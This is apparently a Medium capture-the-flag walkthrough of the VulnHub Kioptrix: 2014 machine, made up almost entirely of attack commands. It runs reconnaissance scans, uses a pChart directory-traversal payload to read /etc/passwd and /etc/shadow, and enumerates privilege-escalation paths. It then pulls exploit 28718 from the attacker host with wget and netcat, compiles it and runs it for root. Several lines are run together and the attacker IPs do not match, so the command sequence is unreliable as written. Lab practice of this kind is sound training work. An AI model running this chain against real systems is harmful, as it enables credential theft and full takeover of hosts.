VulnHub: Kioptrix: 2014

  1. Network Discovery
nmap -sn 10.0.2.24/24
nmap -Pn 10.0.2.20nmap -Pn -p1000 10.0.2.20
nmap -A -p22,80,8080 10.0.2.20
nmap --script vuln -p22,80,8080 10.0.2.20
nikto -h http://10.0.2.20
nikto -h http://10.0.2.20:8080
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/ -x php,txt,html,sh,c
gi -q
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/:8080 -x php,txt,html,sh,c
gi -q
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
http://10.0.2.20/pChart2.1.3/examples/index.php
/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/shadow
/usr/local/etc/apache22/httpd.conf
whoami
/home, /tmp, /var/mail, /var/log
sudo -l
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab
uname -a
searchsploit -m 28718
python -m SimpleHTTPServer 80
cd /tmpwget http://10.0.2.27/28718.c
nc -nvlp 1337 < 28718.c
nc -nv 10.0.2.7 1337 > priv.c
gcc priv.c -o priv
./privwhoami
cd /rootls -la
cat congrats.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store